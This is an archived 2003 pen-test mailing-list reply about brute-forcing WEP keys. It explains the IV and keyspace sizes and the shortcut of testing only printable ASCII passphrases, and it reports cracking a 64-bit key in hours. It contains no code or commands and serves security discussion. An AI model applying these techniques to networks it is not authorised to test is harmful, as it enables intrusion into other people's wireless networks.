Re: V/Scan for Wireless LANs

From: Nicolas RUFF (lists) (ruff.lists_at_edelweb.fr)
Date: 07/21/03

  • Next message: slugbait: "Re: V/Scan for Wireless LANs" 
    Date: Mon, 21 Jul 2003 11:40:44 +0200
To: pen-test@securityfocus.com

    > There are some tools that will work to try to find a WEP key but they require a lot of data and time. They exploit known vulnerabilities in the WEP algorithm to find the keys. However it could take as much as 500 meg of data. I don't have the links handy. Sorry.
    > As far as brute forcing. ok idea but not very doable. to iterate through all cobinations would be 2^128 possibilities which gets you to about 3.4028236692093846346337460743177e+38 possible combinations. If you assumed you could do 1 per second - which would be tough if you wait for DHCP to respond it would take you 10790283070806014188970529154990 years to get through all the combinations. Thats a long time. :) If somebody could check my math that would be great.

            Hello,

    Slight mistake here : the first 24 bits of the key are random (sometimes
    incremental, but most vendors have fixed this by now), but transmitted
    inside the paquet (this is called Initialisation Vector - IV), whereas
    the last 40 / 104 bits are derived from one of the WEP key (since the
    system might use up to 4 WEP keys).

    2^40 = 1099511627776
    2^104 = 20282409603651670423947251286016

    Since RC4 is a fast algorithm, my P4 1.7GHz processor can check around
    25,000 k/s, so I guess you can walk trough a 40-bit keyspace in a couple
    of weeks if you have a cluster a 20 to 30 P4 2.5GHz computers.

    There is also a trick that can save you time : some vendors derive the
    WEP key directly from the ASCII passphrase - that is why you sometimes
    have to give 5-character or 13-character only passphrases. In this case
    you only have to check the ASCII printable character range. I
    successfully manage to crack a 64-bit WEP key using a *single* packet
    within hours using this trick. However I never tried on 128-bit WEP keys.

    Regards,
    - Nicolas RUFF
    -----------------------------------
    Security Consultant
    EdelWeb (http://www.edelweb.fr/)
    Mail : nicolas.ruff@edelweb.fr
    -----------------------------------

    ---------------------------------------------------------------------------
    ----------------------------------------------------------------------------

  • Next message: slugbait: "Re: V/Scan for Wireless LANs"